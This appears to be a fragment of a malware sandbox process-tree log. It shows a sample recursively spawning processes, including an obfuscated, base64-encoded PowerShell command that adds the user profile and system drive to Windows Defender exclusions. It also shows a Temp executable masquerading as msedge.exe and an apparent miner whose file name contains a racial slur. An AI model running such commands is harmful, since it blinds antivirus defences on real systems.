C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="66⤵PID:6356
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"66⤵PID:2080
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"66⤵PID:1088
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="67⤵PID:6440
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"67⤵PID:6504
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"67⤵PID:4324
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="68⤵PID:6744
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"68⤵PID:2444
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"68⤵PID:5412
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="69⤵PID:4412
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"69⤵PID:6880
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"69⤵PID:6816
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="70⤵PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"70⤵PID:3180
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"70⤵PID:3592
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="71⤵PID:6192
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"71⤵PID:4028
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"71⤵PID:996
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="72⤵PID:6492
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"72⤵PID:6644
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"72⤵PID:6752
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="73⤵PID:5256
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"73⤵PID:2500
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"73⤵PID:700
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="74⤵PID:3384
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"74⤵PID:4772
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"74⤵PID:932
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="75⤵PID:6168
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"75⤵PID:6208
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"75⤵PID:1572
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="76⤵PID:4704
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"76⤵PID:3836
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"76⤵PID:436
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="77⤵PID:2432
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"77⤵PID:6504
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"77⤵PID:6204
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="78⤵PID:1328
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"78⤵PID:4684
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"78⤵PID:2988
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="79⤵PID:6524
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"79⤵PID:7044
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"79⤵PID:2164
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="80⤵PID:1860
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"80⤵PID:1432
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"80⤵PID:4880
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="81⤵PID:1892
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"81⤵PID:5592
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"81⤵PID:688
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="82⤵PID:4492
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"82⤵PID:6644
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"82⤵PID:2844
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="83⤵PID:4224
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"83⤵PID:4988
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"83⤵PID:7020
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="84⤵PID:5504
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"84⤵PID:4832
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"84⤵PID:5636
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="85⤵PID:5348
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"85⤵PID:6024
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"85⤵PID:4540
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="86⤵PID:5132
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"86⤵PID:1492
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"86⤵PID:5844
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="87⤵PID:428
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"87⤵PID:5488
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"87⤵PID:5784
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="88⤵PID:4772
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"88⤵PID:5168
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"88⤵PID:5588
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="89⤵PID:5840
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"89⤵PID:1876
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"89⤵PID:3492
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="90⤵PID:5612
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"90⤵PID:6028
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"90⤵PID:4324
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="91⤵PID:5176
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"91⤵PID:6880
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"91⤵PID:5528
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="92⤵PID:6328
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"92⤵PID:1208
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"92⤵PID:7104
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="93⤵PID:2836
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"93⤵PID:3588
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"93⤵PID:6160
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="94⤵PID:5360
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"94⤵PID:1752
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"94⤵PID:1180
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="95⤵PID:6404
-
-
